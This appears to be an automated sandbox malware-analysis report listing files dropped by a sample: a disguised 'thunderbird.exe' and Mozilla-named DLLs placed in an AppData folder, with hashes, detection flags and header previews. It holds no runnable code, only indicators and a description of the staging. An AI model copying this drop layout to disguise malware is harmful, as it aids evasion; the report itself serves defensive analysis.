Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...,..T.................<&...(..b..W..........@............................../.....YD)...`... ..............................................P/.p...../.8.....(.Pj............/...............................(.(...................PQ/..............................text....:&......<&.................`..`.data........P&......@&.............@....rdata......p'......Z'.............@..@.pdata..Pj....(..l....'.............@..@.xdata...R....(..T...^(.............@..@.bss.... a....(..........................idata..p....P/.......(.............@....CRT....0....`/.......(.............@....tls.........p/.......(.............@....rsrc...8...../.......(.............@..@.reloc......../.......(.............@..Butage........./.......(.............@...................................................................................................................................

C:\Users\user\AppData\Local\Temp\idrccptxisabu

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	2675200
Entropy (8bit):	6.745223583528521
Encrypted:	false
SSDEEP:	49152:YTDTVe6BhhQQrTyEjMhn/w2EdU0Oz+E2TQVXmqtRSfoMBBMItgxmQjvVsYcjc9t/:YzVx6RKXURWpyTVnsG
MD5:	74F8644C5185C908D81B778B03068120
SHA1:	B0FAAC424A2E1881BD8E1D26E8F4B069CF689763
SHA-256:	72812A162F9450320A80589A4D432BFAB8C168D199D60783E7792705BD3981D7
SHA-512:	3058310B4A4510C0B85C51839EB1AEC734F5A9C61EA648CCFD5BBDDF72CBF90439AD4B4F889EC503E38087D1E33DA4C8CE99CE03D07727902A563BAB8EAF86D6
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...,..T.................<&...(..b..W..........@............................../.....YD)...`... ..............................................P/.p...../.8.....(.Pj............/...............................(.(...................PQ/..............................text....:&......<&.................`..`.data........P&......@&.............@....rdata......p'......Z'.............@..@.pdata..Pj....(..l....'.............@..@.xdata...R....(..T...^(.............@..@.bss.... a....(..........................idata..p....P/.......(.............@....CRT....0....`/.......(.............@....tls.........p/.......(.............@....rsrc...8...../.......(.............@..@.reloc......../.......(.............@..Butage........./.......(.............@...................................................................................................................................

C:\Users\user\AppData\Roaming\GZManage\js3250.dll

Download File

Process:	C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\thunderbird.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	458848
Entropy (8bit):	6.755005117484388
Encrypted:	false
SSDEEP:	12288:uRS9bzEY9IiJ3GLL8XoscqSgjZa1AJA+zGx:GStzEY9IiJIL84sjSkamJA+zG
MD5:	7C4A1822055BF598F35D72E0EC98F429
SHA1:	2279A6D8E207E03C4C771D8517DD36C037F81FBF
SHA-256:	34B3343A8E21AE1DD96099EB63FD06C715F221CBF5A4A34018EEC1B344A8674F
SHA-512:	0DB43EE062436B1D4172B6E8ADDA499966A5443037F9E8AA378ABCB52A86C3FA01F0F090DCAA14D0810289E39A390E9848475A2FAF04B6776CEAF7D3A8A8ACD6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......w...3...3...3....c..5...\`..7...\`..1...Q`..1...3...w...g\.......y..2...._..7...Rich3...........................PE..L....[?I...........!...............................`......................... ......................................p9...6...4..P...................h...........d-.. ................................................................................text............................... ..`.rdata..t...........................@..@.data....`...p...`...V..............@....rsrc...............................@..@.reloc...........0..................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\GZManage\noubls

Download File

Process:	C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\thunderbird.exe
File Type:	data
Category:	dropped
Size (bytes):	21484
Entropy (8bit):	5.437098621647359
Encrypted:	false
SSDEEP:	384:kZAr47zFtbfHSjzxbMJRQDWNEMC93P/noUmuU7hfSxSdebTKBoTO:uy47zFtbfH2zmJSnoFNJSxSGTKmTO
MD5:	DE2E079B3B6C1DE36B164CE9252CCD2C
SHA1:	0811083BBA474AF86A0BE738509FBD26A233F685
SHA-256:	74A3206A31AA53921C4A6234264515094829BFD12CC6FD15449F3E53129ECCE6
SHA-512:	4C93D07EB4D69CB643F261178A3BE5FFABA7EC8291EFAC73506C27491F63274FD237C0A21C39C308647822B57379B02895CF7BF4DEAA57365E78B0D370F01AF1
Malicious:	false
Preview:	.y`gvM.....y.Y..Bi..eF^......RiaWsa.k._...K......C...W.gD.f..Z.i.....l....sVB..P`.A.l.NTx......iK.\mS........MZ...[..._.Y.C..QZ.Rn.i..n.Z`._.GABhZ^....xMe^y..XCL_........Jx.BZ.bbCu..XJtK..qt.[_.VVbZ.jsh.R.I...._B`..Xw..._N....Nekr.erX....LG..jT.l.j.W.Nk.gE.Hh.mf.`....]B..\.`tf.E`fnn....Eiue.V.[Y\.._r.c...h.uO.MC^q........K.uP..Piq.aR.n..wqKbAkmREvVIq...oUBtU.....Ll..HE.Py.m.Xi..X..Vs^.X..rl...AQQQ..F....Av.Nhe..k..a.XK.m........p...s.j..qT...YatVR.suKcX..._Z.Qj.b^V..kAj.[dKh.a.N...XuM].....x.dMvR.X..]..up..U..n.uaXc......gAU...kK.K.Z]VVVU.wi...UaIfxM.Xt.Z[.bSUw_g....]r.vtFV..]R.^.t......gY`.Jq\e.Jw.....v..oQH....\.P.e.....B.\P.d.Q.k.jftj......x.n.b.Ah.[.UyMt.N].].as..u...d...a_p.Pm..XoV..Bo.....y.B....eoH.i.`Q.f.K[rHQD.F.`Ug....W...w......byg.K....Go..[o.t..e..JXj...bSO.uMR..A....x..Z...bHv..P]j.].......KI.jq..yPN..YHZ.oM..l..o..Pr.j.BO.`Jy..lN..d..g..p...O.SSu.MB[.`.Q.hd.vU...c.Pi..\RH.s..L`....]..R.]a..NP...ehD..ig\Iqd.SaZn.d.u.HmgFy.c.Q...yLI...ncsR..Gap...F.....nrY..L.vr...L...l.r.

C:\Users\user\AppData\Roaming\GZManage\nsldap32v50.dll

Download File

Process:	C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\thunderbird.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	145032
Entropy (8bit):	6.223296464610944
Encrypted:	false
SSDEEP:	3072:aRQRTpMrhZ3qPKnWK62E181dYZFqNpkIkwn:aiRTpMd0Si2d6FOkIk
MD5:	7081AF61B5B48EE3709FFE2996B3362C
SHA1:	69EDA947CEE9426C59683D867954A3DDFA44CC53
SHA-256:	9F3EBED578B7B58C488CD601770C0CD5346D029DB8451425CC2CE8546897F107
SHA-512:	C4E3592048DC41482F4E8F57993EF5328461C476245F125D3470B64EF8A652466BD2C12AE53E2DC9AC94A9A1C77D08F01988AC1622C2C00A28C0DB35E86519CE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........2..ZS..ZS..ZS..!O..XS...O..[S..5L..^S..5L..XS..ZS..cS..8L..YS...p..`S..s..[S..RichZS..........................PE..L....[?I...........!.........p......A..............`.........................0.......A..................................i%......<.................... ....... .......................................................................................text.............................. ..`.rdata..9=.......@..................@..@.data...............................@....reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\GZManage\nsldappr32v50.dll

Download File

Process:	C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\thunderbird.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	30344
Entropy (8bit):	3.9528812148205814
Encrypted:	false
SSDEEP:	192:68TPhk5fVC15iPnyu2rqr3NBW37AI6i3wFVUrBvCzW0BEyncjWOeyowJL/te9Xxu:xTP8fVC783vW3bwQDinNYJLtI
MD5:	B8019E6A4DCF1037AB4FB3EA74FFF91D
SHA1:	BA12B694467BB3979BD3FAEAB8698AA631C1276B
SHA-256:	8377A1BABBDB38611C7BBBAF05AC5108C1C6539104B160CB1DBFCBB7638F3AE8
SHA-512:	F60E79E01C8435EF7AB60AB2D5A38142AD3F3F32139DD77BC6CE877B84B9721077CAA39B868774842639058218740644BB897BE02720E5D2CC7B0F8707FD4FFC
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........................................................x.......Rich............PE..L....[?I...........!..... ...0......g#.......0.....`.........................`.......................................4..@....0..d....................`.......P.......0...............................................0...............................text...*........ .................. ..`.rdata.......0.......0..............@..@.data........@.......@..............@....reloc..\|....P.......P..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\GZManage\nspr4.dll

Download File

Process:	C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\thunderbird.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	161384
Entropy (8bit):	6.486424042107867
Encrypted:	false
SSDEEP:	3072:nt3Y4Gn/cq5IFL+UaxFw2TRvRE1kayxLutLwn2bHcnn4:NYfnheSUaxFPpREWxLuw+
MD5:	312DC77A5D170D38F3D88873181FCC0E
SHA1:	E667573218122C9029DF41ACE48C709ACB5CC5E4
SHA-256:	9018EB816FD4931CFD46793DF9ED4DEDB0184566E7B8AEE39DDE542B4879CB00
SHA-512:	4CA9B816B47C99ADC3D018BAC67612892B4EFAC327E55198245CE202A6BD3BE0F9E11342337AE2533B9462CC1E877568BAA319DFEE9B807AB99808D7B09A15FE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........K.mk..mk..mk..qg..mk..qe..mk..ra..mk..ro..mk..mj.!mk..rx..mk..N[..mk.Nkm..mk.vMo..mk.Rich.mk.................PE..L....[?I...........!..............................`.........................p......)i..............................`....*......x....@..............p`.......P.......................................................................................text............................... ..`.rdata..6j.......p..................@..@.data...\|.... ....... ..............@....rsrc........@.......0..............@..@.reloc.......P... ...@..............@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\GZManage\nss3.dll

Download File

Process:	C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\thunderbird.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	382560
Entropy (8bit):	6.396537438640733
Encrypted:	false
SSDEEP:	6144:Z9bwkDptQVYLyvKKp7AfrVz8lzispR55+/kBLtH7m2R2Kk+XknIUkJuiC3Rl6+/b:Z9bwkDptQVYLyxp7AfrVz8NispRCcbpe
MD5:	0E845C5A84427B1AF9B577C122BC4E23
SHA1:	43AFE65E3AA16C5981B30E6D896F7ED74BE545AE
SHA-256:	F9E1F2A9A88A5D5CA748A84784D56A65D5E611785AA1D3638C07E9B36624BC73
SHA-512:	8C3A9AD7E90E09A53207A287ADF0D283AEB246F4EF4586C3B19C219FDB7614D79B7B15560F1AC5A5D34E918B6595BCB932C8FC96BD1D20FE24CEDC218BF695E2
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............................).............................m.....U.....Rich...........PE..L....[?I...........!.....0..........;2.......@.....`................................................................p................... ...........h...........l....A...............................................@...............................text....#.......0.................. ..`.rdata.......@.......@..............@..@.data....2...@...@...@..............@....rsrc... ...........................@..@.reloc...".......0..................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\GZManage\plc4.dll

Download File

Process:	C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\thunderbird.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	34416
Entropy (8bit):	4.0883403433771806
Encrypted:	false
SSDEEP:	384:MPIxljxCHKnD4PFfxAyOkdyLO6wrgPenNYJLtIT/:M0pnCxgwrgPen4LE
MD5:	9ED02E151C4F5417C10594A19EEEB034
SHA1:	139F6DAA64D1ABC84B48A00CC25049190E338AC0
SHA-256:	FA4BEBED44856339E1D65A670ECBCE8487EC95851B1CF278D40B442E5E118F71
SHA-512:	DA8EA86529BBC407C033DE56C940E6305661167021BF79F893DE232A1ED7C54A294E71FE8FC629767FE9FC0686CD2B30AFD84BF3EEE0415AAA604C8D2CCDE8D9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........[...:..:..:.%...:.%..:.%..:..:..:....:.,<..:.....:.Rich.:.........PE..L....[?I...........!..... ...@......{!.......0....)`.........................p.......................................;......$:..P....P..............xp.......`..`...`0...............................................0..T............................text...>........ .................. ..`.rdata.......0.......0..............@..@.data........@.......@..............@....rsrc........P.......P..............@..@.reloc.......`.......`..............@..B................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\GZManage\plds4.dll

Download File

Process:	C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\thunderbird.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	30312
Entropy (8bit):	3.4254270167584915
Encrypted:	false
SSDEEP:	192:HGaz0KM7Timc4W7uW6cbpXchb+i4BDYFr0ZYyFB+iEyncjWOeyowJL/te9Xx5gOq:HL0KMTi1bigi4BDIr0iyFBNnNYJLtIq
MD5:	5D35EE582ED616947ADE1002F25682CA
SHA1:	70B8862DA9ED370C78F82218251BD40E32C5514A
SHA-256:	ED79346AF0BD7276039E011D72B7C817E2015EDDF91224E08DAF3B2A041CA5AD
SHA-512:	E3B011BD68919E4E8BB664426249F774BF1291434242F5E258D05134CA4C13C27EBDF46C5909D1F3B68731D68F936CACF18A5F9A1397E0A7C8819E2B1A19CADD
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'4.XcU..cU..cU...J..aU...J..fU...J..aU..cU..lU..7v..`U...S..bU...u..gU..RichcU..................PE..L....[?I...........!.........@......;........ ....*`.........................`......................................p".......!..P....@..............p`.......P......@ ............................................... ..@............................text............................... ..`.rdata..S.... ....... ..............@..@.data........0.......0..............@....rsrc........@.......@..............@..@.reloc.......P.......P..............@..B........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\GZManage\smime3.dll

Download File

Process:	C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\thunderbird.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	112224
Entropy (8bit):	5.8935265370850285
Encrypted:	false
SSDEEP:	3072:aHg/reLDq+TdOcQCRcNW+8ilKocmFwSsZGloIYKNloFrYnW:aOyl5OMcNW+hMWup
MD5:	05FF877978A22599F8675344AFF7E9AC
SHA1:	F4E083FBD2442B0D1C9FE107DC7370E5E47BFCB7
SHA-256:	B8F3022392E3BD755B4D3BAE4011303EEA6ACAF5369AE987F33F654A30AEB5C2
SHA-512:	56105DBA4DEABBC2D1F2DE5D38182C71DD197DC32AADADFCE4E8C40E1EABB2E7280BAA60A635D42E71986E962905D24BE0FF4D14E02CC328F7053AA06BBC593B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g.]#...#...#...A...!...L...&...L...!...#......w.........."......+...Rich#...........PE..L....[?I...........!......................... ....+`.................................................................U......@>..x.......0...........h...............@#............................................... ..8............................text...T........................... ..`.rdata...M... ...P... ..............@..@.data... ....p.......p..............@....rsrc...0...........................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\GZManage\softokn3.dll

Download File

Process:	C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\thunderbird.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	254060
Entropy (8bit):	6.420458010773922
Encrypted:	false
SSDEEP:	6144:pc5eOUXOjniT9KfIx54jweoqgKwmQULxoj/idhU:pc5eOHiemOomwhqc
MD5:	DA7C7F8681BC177CC5CC1A5564BD6CE5
SHA1:	CED677CB95E289F022F62BB21D68F5FDB9EDFDD0
SHA-256:	656D3FFB58F3F75F0506595D5D818CECC59AA51DE492B21665ECAA0FF8966CE0
SHA-512:	3FDA6CA7496745A260EC82A3E4AD387AE25CFF19C950C5730F416D9EB7893032C5DC608FF25EACE223BD9F2FB95FADD7F5F7BAF32A52E30AC81BD2F37C4A4547
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......../...N.G.N.G.N.G.Q.G.N.G.R.G.N.GfR.G.N.G.Q.G.N.G.Q.G.N.G.N.G.N.G.m.G.N.G"H.G.N.G.n.G.N.GRich.N.G........PE..L....[?I...........!..............................-`................................z...............................`k.......b..x.......0............................................................................................................text............................... ..`.rdata..\|].......`..................@..@.data...h@...p...@...p..............@....rsrc...0...........................@..@.reloc........... ..................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\GZManage\ssl3.dll

Download File

Process:	C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\thunderbird.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	136800
Entropy (8bit):	6.05442036081695
Encrypted:	false
SSDEEP:	1536:lTvOaQ4zixRrizHmNexem0HfvpFnkkwyaDoaZBE3E5dqz+HNHFm+7zn4:JOaQ4zi78GW0/vpFn/wAE5YzmPm+7zn
MD5:	FDF29B3A596524ADCC11C6031E682E16
SHA1:	E78CCD155ADF81975A3187C6B7B98AD4A90AF594
SHA-256:	F5B17B9122EA779DA6E1C303F7D2D16096970E840A5FE072A65371FCFC9A8D34
SHA-512:	B4C1EF7A7D2E17C35AAF9D2BAB402871520AC2645B6F3AF7593FCAFFC340DC5075B16E8179A69A0513C9E4D51C5DC968E86BCCC4DBE2FACCD1D3A2A0A1315B25
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[.W%..9v..9v..9v}.*v..9v..7v..9vp.3v..9vp.=v..9v..8v..9vK..v..9v..?v..9v..=v..9vRich..9v........................PE..L....[?I...........!.....p..........jt............1`....................................................................z.......x....... ...........h...............P...................................................D............................text....e.......p.................. ..`.rdata...7.......@..................@..@.data...T...........................@....rsrc... ...........................@..@.reloc..`........ ..................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe

Download File

Process:	C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\thunderbird.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	8504936
Entropy (8bit):	6.712907921131404
Encrypted:	false
SSDEEP:	196608:hAvt9ppoRcGBLRrgeu1kEMgHNODPzMhp0GEZhrKCwVFE1GfYJWDew3d4QeW2jscn:hAvjppoRcGBLRrgeu1kEMgHNqPzMhyGW
MD5:	A9D830B99ABEA315C465A440C4AA1B94
SHA1:	CCA605A33BA3CEFDF179CB93743A643A86518EFF
SHA-256:	815FC1B444CF92E9A7EB8BDAEAA9FF61A4FE49F88C9C691A87AD4C2A26956BC3
SHA-512:	4FE3D34DCE5D5A829F76B610EB65E60D14263901F6783BD0E2BEC76B7C6E94817CB955EB0C5AA8590AAEB3C718F9C24911C64D463E37DC14CFC4A2A4B0C63667
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........?..wQ..wQ..wQ..k]..wQ.@k_..wQ..h[..wQ..hU..wQ..hB..wQ..wQ..wQ..hB..wQ..Ta..wQ..wP.2.Q..T`.aqQ..qW..wQ.<WU..wQ.Rich.wQ.........................PE..L....X?I..................c..N......H.c.......c...@..........................0.......................................ry.<_..tEx......@..0...........p.................c...............................................c..#...........................text....c.......c................. ..`.rdata........c.......c.............@..@.data....S....y.......y.............@....rsrc...0....@.....................@..@................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\GZManage\uwibrk

Download File

Process:	C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\thunderbird.exe
File Type:	data
Category:	dropped
Size (bytes):	4641689
Entropy (8bit):	7.95439482597699
Encrypted:	false
SSDEEP:	98304:m6u+UOCN1tSz2J8VrYFGGOdaq9uRaQVLPmH+uTUCOqTIom4oIo:Q+Ng1Yzm89YvOdaqElVLuHvTU5QIomJ
MD5:	7045D874EE7EF54A76503EC5C8E65F2A
SHA1:	D6F76F241E1BEAB6A34EEB26380C38BFD5BECF52
SHA-256:	08EE9C18D725B3133AA0254DCD94D220A7ECD717641C996B06748F07AF701DBF
SHA-512:	0FE934493ED2CA2712758FE460D4BC5F111D99AD45E38FD2CF53CD7794334B2A87D0F431D944907C7B3C2ECF375B2F101303D503A492A6B065C05E5A07C090E8
Malicious:	false
Preview:	.I]..w....oj.P.T.O.tt.O.._.y]I..yus..F.[Xn..b.Q.iL...a.u..I.Q..Int.k.I..q.P..P..O...JO.bq.nU.q..`Kj.rk..N[....sG..WXqL..GBh.Rw....KQ.y..S..__jT..E.FK.OD..Rhcr.RK.lSZ.hrF..Rvcg.YLrt.VssrA\i..Q.TPh..k.`..E....Hh.....^...[.....\...nw..mC....[.JNGj..e.Wj.EJNK..Q.....tc.TjCyr..Z..jt...Y.g.uy.Qc^.hQ..c]L..lAyRmA.p...bsSv.q.RM.X.X......oN......s.M..c..FRnRQyfFX.KZ.Y..SiY..m_.V.iI\.k...w..r..r.Gx...Sl..`k..QIWdO.N.dv....YK...C..`...Xb.ieY.[...wZm.`.Tc.D..KW.W.W.]....H.......Y.WJ.aU...n.q....Eu.p..].w.fLA.M....kab..Uyyj.w..JQN...w.d.......njk.f.xwUPa..l\....Mi.O.v....^o.qh.t..I....DQJo...g...T.iaJXm.K.bIoU.S.w.MW.RUXTF.T..rB....]...fhd.jc....K.....rf.Sfvj._Z.k..\u.n]fw...uy..X.R........f..S.j.....[]Eri.yN.hx...f.RySZh..p.].O...e.i.....C..fu.....FMB...Z.u\[..R.RwsS.Or.N.^..cG...B....i.ZGBJ.o.....IWxl.D.VOC.....k.[.YFE.B..bN..k.BU......f.DDf.yUw.....ZLl.......s...t.F....P.dOM.B...h.d.iAn.cb.a.oW.J.p..AN..FO..ct..`.A......p.V...........M...n.hj..bxMu..u.e...GYIb..`..mQ...J.._K.w.C.f...VTtjDKZ..._O

C:\Users\user\AppData\Roaming\GZManage\xpcom_compat.dll

Download File

Process:	C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\thunderbird.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	73840
Entropy (8bit):	6.756538727570579
Encrypted:	false
SSDEEP:	1536:X9W1JxRrk7xYaPxOw922ESbw030w/aUeEr32n4Q:obrSYaF2X8RaUecmn
MD5:	E9B352B512E03ED5C35D6350414B68AD
SHA1:	64CCB609EE5BB52A8DD58E95D6D56F54A7E33A49
SHA-256:	0895B8029EAB334D2AA5D31A77A975198BD71EE8D641825FCFCD178A0C5BA3D3
SHA-512:	776AC14B782AD8B9DEA952EB1AE09D799EDB5D7EA5AD7C358BCBDCD7E6C2545BE78D55467E7101E0FABF01D6668F7CA4872D57C526E2AA3F2D436A65AD85C8D4
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........B...#...#...#...?...#..N?...#...<...#...<...#...<...#...#...#...<...#...#..N#.......#.......#...%...#..2....#..Rich.#..........................PE..L....[?I...........!.........n....................5`.........................@..........................................oE..0........ ..............x........0..P... ................................................... ............................text............................... ..`.rdata...Y.......Z..................@..@.data...l...........................@....rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\GZManage\xpcom_core.dll

Download File

Process:	C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\thunderbird.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	414832
Entropy (8bit):	6.835309595385882
Encrypted:	false
SSDEEP:	12288:uOQdJEzxhYuUZzp63kZEaYswEJM2r0P3/6e5n:uOQdWEzpAcECrte5n
MD5:	CFAC67CE4389AF145FCB33D05E2E4243
SHA1:	F0F4F60717516250EDA61299615E939B1C8B0F02
SHA-256:	822C28935F9ACFFA0F894652ADC9BA344308990005B4439E36AEA4544B9B2B80
SHA-512:	6E3F45EEFDA139AA2140FE5172321A621E87866499020220135D4A6836685EF347B9DEE7FB05332B9ACC2C6A43D44F5980C5A77D0B2C8173D221B5DAD5668811
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......n:..[..[..[..QG..([..G..,[..ED../[..ED..([..[...[..HD..&[..[..9Z..~x../[..~x..U[...]..+[...{.."[..Rich[..................PE..L....[?I...........!.....4...........>.......P....7`.................................D..............................P....M..h........@.......................P...:...T...............................................P..t............................text...;3.......4.................. ..`.rdata.......P.......8..............@..@.data...p'.......&..................@....rsrc........@......................@..@.reloc...?...P...@..................@..B........................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe

Download File

Process:	C:\Users\user\Desktop\UolJwovI8c.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	10636628
Entropy (8bit):	7.993099184151181
Encrypted:	true
SSDEEP:	196608:sfUUhRnMReYqoWJ8O1FrYKuMdQRCbRGWj0MpQXs2eQdYwWXqEEV8MEkqISNNNtb:8LhqRevZYqaWVf2ldYB6f8/1vd
MD5:	5DEBD32329500518D4F21225DCB64E43
SHA1:	7F900A979A4B1609E79E51140129CA21B08E3F1D
SHA-256:	8918399591D6A752514DF73A9EEB9F92221C650CA28D6B1B2798F3F561A52547
SHA-512:	0B4A3C08C8715A1531B8FB384C77AD9E672856DD295843168B8E723D96D9E98AA96A50630009CF3648A8E26B6D7E02B9E96E4AB2B6632B46A9F007031205880D
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A!.S.@...@...@......@.....y@......@..."\|..@..."{..@..."z.#@...8...@...8...@...@~.PA...#z.N@...#...@...@...@...#}..@..Rich.@..................PE..L......Z.....................t....................@..........................P............@..............................................:.......................=..Pv..T....................v......0p..@...................4........................text...7........................... ..`.rdata..`...........................@..@.data...0...........................@....wixburn8...........................@..@.rsrc....:.......<..................@..@.reloc...=.......>..................@..B................................................................................................................................................................................................................................................

C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\BootstrapperApplicationData.xml

Download File

Process:	C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (483), with CRLF line terminators
Category:	dropped
Size (bytes):	2388
Entropy (8bit):	3.7337280491206837
Encrypted:	false
SSDEEP:	48:y+03qHhhOXWkFepne1vGp0Ji0wEycuT83vgkWHaiJ+rB7i4+rDDl:X/xn6vGpj0wEycl3vgkTi+rB7H+r9
MD5:	18FB784C4B3D79FC09FB3E275B9DE67D
SHA1:	A09979D827F51E0E53B375F8C76DAD5AC5EA9A5F
SHA-256:	E6BF47FDA379E8F5E88EA2DE2516A0F029AAAE8A2A2B856BD4BEB6497DBF34E0
SHA-512:	73874A8120653D1A81416D8F573D8765481EE72957E2ACECC689DAE9864FAEEA62AEF87B4C169E6FA6850629EC46088E9F13C0C47E42922E9524921725506843
Malicious:	false
